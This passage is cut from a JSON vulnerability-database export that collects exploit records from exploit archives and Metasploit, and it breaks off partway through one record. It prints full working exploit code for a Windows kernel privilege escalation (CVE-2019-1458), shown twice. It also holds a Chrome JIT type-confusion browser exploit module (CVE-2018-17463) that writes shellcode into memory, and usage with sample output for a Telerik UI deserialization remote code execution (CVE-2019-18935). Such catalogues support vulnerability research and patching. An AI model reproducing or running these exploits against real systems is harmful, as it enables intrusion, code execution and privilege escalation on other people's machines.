"id": "1337DAY-ID-34066", "href": "https://0day.today/exploit/description/34066", "sourceData": "#include 
<cstdio>\r\n#include <windows.h>\r\n\r\nextern \"C\" NTSTATUS NtUserMessageCall(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam, ULONG_PTR ResultInfo, DWORD dwType, BOOL bAscii);\r\n\r\nint main() { \r\n HINSTANCE hInstance = GetModuleHandle(NULL);\r\n\r\n WNDCLASSEX wcx;\r\n ZeroMemory(&wcx, sizeof(wcx));\r\n wcx.hInstance = hInstance;\r\n wcx.cbSize = sizeof(wcx);\r\n wcx.lpszClassName = L\"SploitWnd\";\r\n wcx.lpfnWndProc = DefWindowProc;\r\n wcx.cbWndExtra = 8; //pass check in xxxSwitchWndProc to set wnd->fnid = 0x2A0\r\n \r\n printf(\"[*] Registering window\\n\");\r\n ATOM wndAtom = RegisterClassEx(&wcx);\r\n if (wndAtom == INVALID_ATOM) {\r\n printf(\"[-] Failed registering SploitWnd window class\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"[*] Creating instance of this window\\n\");\r\n HWND sploitWnd = CreateWindowEx(0, L\"SploitWnd\", L\"\", WS_VISIBLE, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);\r\n if (sploitWnd == INVALID_HANDLE_VALUE) {\r\n printf(\"[-] Failed to create SploitWnd window\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"[*] Calling NtUserMessageCall to set fnid = 0x2A0 on window\\n\");\r\n NtUserMessageCall(sploitWnd, WM_CREATE, 0, 0, 0, 0xE0, 1);\r\n\r\n printf(\"[*] Allocate memory to be used for corruption\\n\");\r\n PVOID mem = VirtualAlloc(0, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\r\n printf(\"\\tptr: %p\\n\", mem);\r\n PBYTE byteView = (PBYTE)mem;\r\n byteView[0x6c] = 1; // use GetKeyState in xxxPaintSwitchWindow\r\n\r\n //pass DrawSwitchWndHilite double dereference\r\n PVOID* ulongView = (PVOID*)mem;\r\n ulongView[0x20 / sizeof(PVOID)] = mem;\r\n\r\n printf(\"[*] Calling SetWindowLongPtr to set window extra data, that will be later dereferenced\\n\");\r\n SetWindowLongPtr(sploitWnd, 0, (LONG_PTR)mem);\r\n printf(\"[*] GetLastError = %x\\n\", GetLastError());\r\n\r\n printf(\"[*] Creating switch window #32771, this has a result of setting (gpsi+0x154) = 0x130\\n\");\r\n HWND switchWnd = CreateWindowEx(0, (LPCWSTR)0x8003, 
L\"\", 0, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);\r\n\r\n printf(\"[*] Simulating alt key press\\n\");\r\n BYTE keyState[256];\r\n GetKeyboardState(keyState);\r\n keyState[VK_MENU] |= 0x80;\r\n SetKeyboardState(keyState);\r\n\r\n printf(\"[*] Triggering dereference of wnd->extraData by calling NtUserMessageCall second time\");\r\n NtUserMessageCall(sploitWnd, WM_ERASEBKGND, 0, 0, 0, 0x0, 1);\r\n}\n\n# 0day.today [2020-03-09] #", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34066"}], "exploitpack": [{"lastseen": "2020-04-01T20:40:44", "description": "\nTelerik UI - Remote Code Execution via Insecure Deserialization", "edition": 1, "published": "2019-12-18T00:00:00", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "EXPLOITPACK:AE2D3F648B410F57DC5F105EDA166E2B", "href": "", "sourceData": "See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\n\nInstall\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\npython3 -m venv env\nsource env/bin/activate\npip3 install -r requirements.txt\n\nRequirements\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. 
PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\n\nUsage\nCompile mixed mode assembly DLL payload\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\n\nbuild_dll.bat sleep.c\nUpload and load payload into application via insecure deserialization\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\n\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\n[*] Local payload name: sleep_2019121205271355_x86.dll\n[*] Destination folder: C:\\Windows\\Temp\n[*] Remote payload name: 1576142987.918625.dll\n\n{'fileInfo': {'ContentLength': 75264,\n 'ContentType': 'application/octet-stream',\n 'DateJson': '1970-01-01T00:00:00.000Z',\n 'FileName': '1576142987.918625.dll',\n 'Index': 0},\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\n 'Telerik.Web.UI, Version=<VERSION>, '\n 'Culture=neutral, '\n 'PublicKeyToken=<TOKEN>',\n 'TempFileName': '1576142987.918625.dll'}}\n\n[*] Triggering deserialization...\n\n<title>Runtime Error</title>\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\n<h2> <i>Runtime Error</i> </h2></span>\n...omitted for brevity...\n\n[*] Response time: 13.01 seconds\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\n\nThanks\n@mwulftange initially discovered this vulnerability. 
@bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2019-12-18T13:23:58", "description": "", "published": "2019-12-18T00:00:00", "type": "exploitdb", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "EDB-ID:47793", "href": "https://www.exploit-db.com/exploits/47793", "sourceData": "See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\r\n\r\nInstall\r\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\r\npython3 -m venv env\r\nsource env/bin/activate\r\npip3 install -r requirements.txt\r\n\r\nRequirements\r\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. 
PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\r\n\r\nUsage\r\nCompile mixed mode assembly DLL payload\r\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\r\n\r\nbuild_dll.bat sleep.c\r\nUpload and load payload into application via insecure deserialization\r\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\r\n\r\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\r\n[*] Local payload name: sleep_2019121205271355_x86.dll\r\n[*] Destination folder: C:\\Windows\\Temp\r\n[*] Remote payload name: 1576142987.918625.dll\r\n\r\n{'fileInfo': {'ContentLength': 75264,\r\n 'ContentType': 'application/octet-stream',\r\n 'DateJson': '1970-01-01T00:00:00.000Z',\r\n 'FileName': '1576142987.918625.dll',\r\n 'Index': 0},\r\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\r\n 'Telerik.Web.UI, Version=<VERSION>, '\r\n 'Culture=neutral, '\r\n 'PublicKeyToken=<TOKEN>',\r\n 'TempFileName': '1576142987.918625.dll'}}\r\n\r\n[*] Triggering deserialization...\r\n\r\n<title>Runtime Error</title>\r\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\r\n<h2> <i>Runtime Error</i> </h2></span>\r\n...omitted for brevity...\r\n\r\n[*] Response time: 13.01 seconds\r\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\r\n\r\nThanks\r\n@mwulftange initially discovered this vulnerability. 
@bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/47793"}, {"lastseen": "2020-03-09T21:37:40", "description": "", "published": "2020-03-09T00:00:00", "type": "exploitdb", "title": "Google Chrome 67, 68 and 69 - Object.create Type Confusion (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17463"], "modified": "2020-03-09T00:00:00", "id": "EDB-ID:48184", "href": "https://www.exploit-db.com/exploits/48184", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Google Chrome 67, 68 and 69 Object.create exploit',\r\n 'Description' => %q{\r\n This modules exploits a type confusion in Google Chromes JIT compiler.\r\n The Object.create operation can be used to cause a type confusion between a\r\n PropertyArray and a NameDictionary.\r\n The payload is executed within the rwx region of the sandboxed renderer\r\n process, so the browser must be run with the --no-sandbox option for the\r\n payload to work.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'saelo', # discovery and exploit\r\n 'timwr', # metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2018-17463'],\r\n ['URL', 'http://www.phrack.org/papers/jit_exploitation.html'],\r\n ['URL', 
'https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce'],\r\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\r\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'],\r\n ],\r\n 'Arch' => [ ARCH_X64 ],\r\n 'Platform' => ['windows', 'osx'],\r\n 'DefaultTarget' => 0,\r\n 'Targets' => [ [ 'Automatic', { } ] ],\r\n 'DisclosureDate' => 'Sep 25 2018'))\r\n register_advanced_options([\r\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]),\r\n ])\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n\r\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\r\n print_status(\"[*] \" + request.body)\r\n send_response(cli, '')\r\n return\r\n end\r\n\r\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\r\n\r\n jscript = %Q^\r\nlet shellcode = new Uint8Array([#{Rex::Text::to_num(payload.encoded)}]);\r\n\r\nlet ab = new ArrayBuffer(8);\r\nlet floatView = new Float64Array(ab);\r\nlet uint64View = new BigUint64Array(ab);\r\nlet uint8View = new Uint8Array(ab);\r\n\r\nNumber.prototype.toBigInt = function toBigInt() {\r\n floatView[0] = this;\r\n return uint64View[0];\r\n};\r\n\r\nBigInt.prototype.toNumber = function toNumber() {\r\n uint64View[0] = this;\r\n return floatView[0];\r\n};\r\n\r\nfunction hex(n) {\r\n return '0x' + n.toString(16);\r\n};\r\n\r\nfunction fail(s) {\r\n print('FAIL ' + s);\r\n throw null;\r\n}\r\n\r\nconst NUM_PROPERTIES = 32;\r\nconst MAX_ITERATIONS = 100000;\r\n\r\nfunction gc() {\r\n for (let i = 0; i < 200; i++) {\r\n new ArrayBuffer(0x100000);\r\n }\r\n}\r\n\r\nfunction make(properties) {\r\n let o = {inline: 42} // TODO\r\n for (let i = 0; i < NUM_PROPERTIES; i++) {\r\n eval(`o.p${i} = properties[${i}];`);\r\n }\r\n return o;\r\n}\r\n\r\nfunction pwn() {\r\n function find_overlapping_properties() {\r\n let propertyNames = [];\r\n for (let i = 0; i < 
NUM_PROPERTIES; i++) {\r\n propertyNames[i] = `p${i}`;\r\n }\r\n eval(`\r\n function vuln(o) {\r\n let a = o.inline;\r\n this.Object.create(o);\r\n ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\\\n')}\r\n return [${propertyNames.join(', ')}];\r\n }\r\n `);\r\n\r\n let propertyValues = [];\r\n for (let i = 1; i < NUM_PROPERTIES; i++) {\r\n propertyValues[i] = -i;\r\n }\r\n\r\n for (let i = 0; i < MAX_ITERATIONS; i++) {\r\n let r = vuln(make(propertyValues));\r\n if (r[1] !== -1) {\r\n for (let i = 1; i < r.length; i++) {\r\n if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {\r\n return [i, -r[i]];\r\n }\r\n }\r\n }\r\n }\r\n\r\n fail(\"Failed to find overlapping properties\");\r\n }\r\n\r\n function addrof(obj) {\r\n eval(`\r\n function vuln(o) {\r\n let a = o.inline;\r\n this.Object.create(o);\r\n return o.p${p1}.x1;\r\n }\r\n `);\r\n\r\n let propertyValues = [];\r\n propertyValues[p1] = {x1: 13.37, x2: 13.38};\r\n propertyValues[p2] = {y1: obj};\r\n\r\n let i = 0;\r\n for (; i < MAX_ITERATIONS; i++) {\r\n let res = vuln(make(propertyValues));\r\n if (res !== 13.37)\r\n return res.toBigInt()\r\n }\r\n\r\n fail(\"Addrof failed\");\r\n }\r\n\r\n function corrupt_arraybuffer(victim, newValue) {\r\n eval(`\r\n function vuln(o) {\r\n let a = o.inline;\r\n this.Object.create(o);\r\n let orig = o.p${p1}.x2;\r\n o.p${p1}.x2 = ${newValue.toNumber()};\r\n return orig;\r\n }\r\n `);\r\n\r\n let propertyValues = [];\r\n let o = {x1: 13.37, x2: 13.38};\r\n propertyValues[p1] = o;\r\n propertyValues[p2] = victim;\r\n\r\n for (let i = 0; i < MAX_ITERATIONS; i++) {\r\n o.x2 = 13.38;\r\n let r = vuln(make(propertyValues));\r\n if (r !== 13.38)\r\n return r.toBigInt();\r\n }\r\n\r\n fail(\"Corrupt ArrayBuffer failed\");\r\n }\r\n\r\n let [p1, p2] = find_overlapping_properties();\r\n print(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);\r\n\r\n let memview_buf = new ArrayBuffer(1024);\r\n let driver_buf = new ArrayBuffer(1024);\r\n\r\n 
gc();\r\n\r\n let memview_buf_addr = addrof(memview_buf);\r\n memview_buf_addr--;\r\n print(`ArrayBuffer @ ${hex(memview_buf_addr)}`);\r\n\r\n let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);\r\n\r\n let driver = new BigUint64Array(driver_buf);\r\n let original_memview_buf_ptr = driver[4];\r\n\r\n let memory = {\r\n write(addr, bytes) {\r\n driver[4] = addr;\r\n let memview = new Uint8Array(memview_buf);\r\n memview.set(bytes);\r\n },\r\n read(addr, len) {\r\n driver[4] = addr;\r\n let memview = new Uint8Array(memview_buf);\r\n return memview.subarray(0, len);\r\n },\r\n readPtr(addr) {\r\n driver[4] = addr;\r\n let memview = new BigUint64Array(memview_buf);\r\n return memview[0];\r\n },\r\n writePtr(addr, ptr) {\r\n driver[4] = addr;\r\n let memview = new BigUint64Array(memview_buf);\r\n memview[0] = ptr;\r\n },\r\n addrof(obj) {\r\n memview_buf.leakMe = obj;\r\n let props = this.readPtr(memview_buf_addr + 8n);\r\n return this.readPtr(props + 15n) - 1n;\r\n },\r\n };\r\n\r\n // Generate a RWX region for the payload\r\n function get_wasm_instance() {\r\n var buffer = new Uint8Array([\r\n 0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0,\r\n 1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,\r\n 128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,\r\n 101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11\r\n ]);\r\n return new WebAssembly.Instance(new WebAssembly.Module(buffer),{});\r\n }\r\n\r\n let wasm_instance = get_wasm_instance();\r\n let wasm_addr = memory.addrof(wasm_instance);\r\n print(\"wasm_addr @ \" + hex(wasm_addr));\r\n let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n);\r\n print(\"wasm_rwx @ \" + hex(wasm_rwx_addr));\r\n\r\n memory.write(wasm_rwx_addr, shellcode);\r\n\r\n let fake_vtab = new ArrayBuffer(0x80);\r\n let fake_vtab_u64 = new BigUint64Array(fake_vtab);\r\n let fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n);\r\n\r\n 
let div = document.createElement('div');\r\n let div_addr = memory.addrof(div);\r\n print('div_addr @ ' + hex(div_addr));\r\n let el_addr = memory.readPtr(div_addr + 0x20n);\r\n print('el_addr @ ' + hex(div_addr));\r\n\r\n fake_vtab_u64.fill(wasm_rwx_addr, 6, 10);\r\n memory.writePtr(el_addr, fake_vtab_addr);\r\n\r\n print('Triggering...');\r\n\r\n // Trigger virtual call\r\n div.dispatchEvent(new Event('click'));\r\n\r\n // We are done here, repair the corrupted array buffers\r\n let addr = memory.addrof(driver_buf);\r\n memory.writePtr(addr + 32n, original_driver_buf_ptr);\r\n memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr);\r\n}\r\n\r\npwn();\r\n^\r\n\r\n if datastore['DEBUG_EXPLOIT']\r\n debugjs = %Q^\r\nprint = function(arg) {\r\n var request = new XMLHttpRequest();\r\n request.open(\"POST\", \"/print\", false);\r\n request.send(\"\" + arg);\r\n};\r\n^\r\n jscript = \"#{debugjs}#{jscript}\"\r\n else\r\n jscript.gsub!(/\\/\\/.*$/, '') # strip comments\r\n jscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\r\n end\r\n\r\n html = %Q^\r\n<html>\r\n<head>\r\n<script>\r\n#{jscript}\r\n</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n^\r\n\r\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\r\n end\r\n\r\nend", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/48184"}, {"lastseen": "2020-03-09T21:37:40", "description": "", "published": "2020-03-03T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - 'WizardOpium' Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2020-03-03T00:00:00", "id": "EDB-ID:48180", "href": "https://www.exploit-db.com/exploits/48180", "sourceData": "#include <cstdio>\r\n#include <windows.h>\r\n\r\nextern \"C\" NTSTATUS NtUserMessageCall(HWND hWnd, UINT msg, WPARAM wParam, 
LPARAM lParam, ULONG_PTR ResultInfo, DWORD dwType, BOOL bAscii);\r\n\r\nint main() { \r\n HINSTANCE hInstance = GetModuleHandle(NULL);\r\n\r\n WNDCLASSEX wcx;\r\n ZeroMemory(&wcx, sizeof(wcx));\r\n wcx.hInstance = hInstance;\r\n wcx.cbSize = sizeof(wcx);\r\n wcx.lpszClassName = L\"SploitWnd\";\r\n wcx.lpfnWndProc = DefWindowProc;\r\n wcx.cbWndExtra = 8; //pass check in xxxSwitchWndProc to set wnd->fnid = 0x2A0\r\n \r\n printf(\"[*] Registering window\\n\");\r\n ATOM wndAtom = RegisterClassEx(&wcx);\r\n if (wndAtom == INVALID_ATOM) {\r\n printf(\"[-] Failed registering SploitWnd window class\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"[*] Creating instance of this window\\n\");\r\n HWND sploitWnd = CreateWindowEx(0, L\"SploitWnd\", L\"\", WS_VISIBLE, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);\r\n if (sploitWnd == INVALID_HANDLE_VALUE) {\r\n printf(\"[-] Failed to create SploitWnd window\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"[*] Calling NtUserMessageCall to set fnid = 0x2A0 on window\\n\");\r\n NtUserMessageCall(sploitWnd, WM_CREATE, 0, 0, 0, 0xE0, 1);\r\n\r\n printf(\"[*] Allocate memory to be used for corruption\\n\");\r\n PVOID mem = VirtualAlloc(0, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\r\n printf(\"\\tptr: %p\\n\", mem);\r\n PBYTE byteView = (PBYTE)mem;\r\n byteView[0x6c] = 1; // use GetKeyState in xxxPaintSwitchWindow\r\n\r\n //pass DrawSwitchWndHilite double dereference\r\n PVOID* ulongView = (PVOID*)mem;\r\n ulongView[0x20 / sizeof(PVOID)] = mem;\r\n\r\n printf(\"[*] Calling SetWindowLongPtr to set window extra data, that will be later dereferenced\\n\");\r\n SetWindowLongPtr(sploitWnd, 0, (LONG_PTR)mem);\r\n printf(\"[*] GetLastError = %x\\n\", GetLastError());\r\n\r\n printf(\"[*] Creating switch window #32771, this has a result of setting (gpsi+0x154) = 0x130\\n\");\r\n HWND switchWnd = CreateWindowEx(0, (LPCWSTR)0x8003, L\"\", 0, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);\r\n\r\n printf(\"[*] Simulating alt key press\\n\");\r\n BYTE 
keyState[256];\r\n GetKeyboardState(keyState);\r\n keyState[VK_MENU] |= 0x80;\r\n SetKeyboardState(keyState);\r\n\r\n printf(\"[*] Triggering dereference of wnd->extraData by calling NtUserMessageCall second time\");\r\n NtUserMessageCall(sploitWnd, WM_ERASEBKGND, 0, 0, 0, 0x0, 1);\r\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/48180"}], "metasploit": [{"lastseen": "2020-10-13T17:44:26", "description": "This modules exploits a type confusion in Google Chromes JIT compiler. The Object.create operation can be used to cause a type confusion between a PropertyArray and a NameDictionary. The payload is executed within the rwx region of the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work.\n", "published": "2020-02-14T22:10:52", "type": "metasploit", "title": "Google Chrome 67, 68 and 69 Object.create exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17463"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/BROWSER/CHROME_OBJECT_CREATE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Google Chrome 67, 68 and 69 Object.create exploit',\n 'Description' => %q{\n This modules exploits a type confusion in Google Chromes JIT compiler.\n The Object.create operation can be used to cause a type confusion between a\n PropertyArray and a NameDictionary.\n The payload is executed within the rwx region of the sandboxed renderer\n process, so the browser must be run with the --no-sandbox option for the\n payload to work.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'saelo', # discovery and exploit\n 'timwr', # metasploit 
module\n ],\n 'References' => [\n ['CVE', '2018-17463'],\n ['URL', 'http://www.phrack.org/papers/jit_exploitation.html'],\n ['URL', 'https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce'],\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'],\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => ['windows', 'osx'],\n 'DefaultTarget' => 0,\n 'Targets' => [ [ 'Automatic', { } ] ],\n 'DisclosureDate' => '2018-09-25'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]),\n ])\n end\n\n def on_request_uri(cli, request)\n\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\n print_status(\"[*] \" + request.body)\n send_response(cli, '')\n return\n end\n\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\n\n jscript = %Q^\nlet shellcode = new Uint8Array([#{Rex::Text::to_num(payload.encoded)}]);\n\nlet ab = new ArrayBuffer(8);\nlet floatView = new Float64Array(ab);\nlet uint64View = new BigUint64Array(ab);\nlet uint8View = new Uint8Array(ab);\n\nNumber.prototype.toBigInt = function toBigInt() {\n floatView[0] = this;\n return uint64View[0];\n};\n\nBigInt.prototype.toNumber = function toNumber() {\n uint64View[0] = this;\n return floatView[0];\n};\n\nfunction hex(n) {\n return '0x' + n.toString(16);\n};\n\nfunction fail(s) {\n print('FAIL ' + s);\n throw null;\n}\n\nconst NUM_PROPERTIES = 32;\nconst MAX_ITERATIONS = 100000;\n\nfunction gc() {\n for (let i = 0; i < 200; i++) {\n new ArrayBuffer(0x100000);\n }\n}\n\nfunction make(properties) {\n let o = {inline: 42} // TODO\n for (let i = 0; i < NUM_PROPERTIES; i++) {\n eval(`o.p${i} = properties[${i}];`);\n }\n return o;\n}\n\nfunction pwn() {\n function find_overlapping_properties() {\n let propertyNames = [];\n for (let i = 0; i < 
NUM_PROPERTIES; i++) {\n propertyNames[i] = `p${i}`;\n }\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\\\n')}\n return [${propertyNames.join(', ')}];\n }\n `);\n\n let propertyValues = [];\n for (let i = 1; i < NUM_PROPERTIES; i++) {\n propertyValues[i] = -i;\n }\n\n for (let i = 0; i < MAX_ITERATIONS; i++) {\n let r = vuln(make(propertyValues));\n if (r[1] !== -1) {\n for (let i = 1; i < r.length; i++) {\n if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {\n return [i, -r[i]];\n }\n }\n }\n }\n\n fail(\"Failed to find overlapping properties\");\n }\n\n function addrof(obj) {\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n return o.p${p1}.x1;\n }\n `);\n\n let propertyValues = [];\n propertyValues[p1] = {x1: 13.37, x2: 13.38};\n propertyValues[p2] = {y1: obj};\n\n let i = 0;\n for (; i < MAX_ITERATIONS; i++) {\n let res = vuln(make(propertyValues));\n if (res !== 13.37)\n return res.toBigInt()\n }\n\n fail(\"Addrof failed\");\n }\n\n function corrupt_arraybuffer(victim, newValue) {\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n let orig = o.p${p1}.x2;\n o.p${p1}.x2 = ${newValue.toNumber()};\n return orig;\n }\n `);\n\n let propertyValues = [];\n let o = {x1: 13.37, x2: 13.38};\n propertyValues[p1] = o;\n propertyValues[p2] = victim;\n\n for (let i = 0; i < MAX_ITERATIONS; i++) {\n o.x2 = 13.38;\n let r = vuln(make(propertyValues));\n if (r !== 13.38)\n return r.toBigInt();\n }\n\n fail(\"Corrupt ArrayBuffer failed\");\n }\n\n let [p1, p2] = find_overlapping_properties();\n print(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);\n\n let memview_buf = new ArrayBuffer(1024);\n let driver_buf = new ArrayBuffer(1024);\n\n gc();\n\n let memview_buf_addr = addrof(memview_buf);\n memview_buf_addr--;\n print(`ArrayBuffer @ ${hex(memview_buf_addr)}`);\n\n let original_driver_buf_ptr = 
corrupt_arraybuffer(driver_buf, memview_buf_addr);\n\n let driver = new BigUint64Array(driver_buf);\n let original_memview_buf_ptr = driver[4];\n\n let memory = {\n write(addr, bytes) {\n driver[4] = addr;\n let memview = new Uint8Array(memview_buf);\n memview.set(bytes);\n },\n read(addr, len) {\n driver[4] = addr;\n let memview = new Uint8Array(memview_buf);\n return memview.subarray(0, len);\n },\n readPtr(addr) {\n driver[4] = addr;\n let memview = new BigUint64Array(memview_buf);\n return memview[0];\n },\n writePtr(addr, ptr) {\n driver[4] = addr;\n let memview = new BigUint64Array(memview_buf);\n memview[0] = ptr;\n },\n addrof(obj) {\n memview_buf.leakMe = obj;\n let props = this.readPtr(memview_buf_addr + 8n);\n return this.readPtr(props + 15n) - 1n;\n },\n };\n\n // Generate a RWX region for the payload\n function get_wasm_instance() {\n var buffer = new Uint8Array([\n 0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0,\n 1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,\n 128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,\n 101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11\n ]);\n return new WebAssembly.Instance(new WebAssembly.Module(buffer),{});\n }\n\n let wasm_instance = get_wasm_instance();\n let wasm_addr = memory.addrof(wasm_instance);\n print(\"wasm_addr @ \" + hex(wasm_addr));\n let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n);\n print(\"wasm_rwx @ \" + hex(wasm_rwx_addr));\n\n memory.write(wasm_rwx_addr, 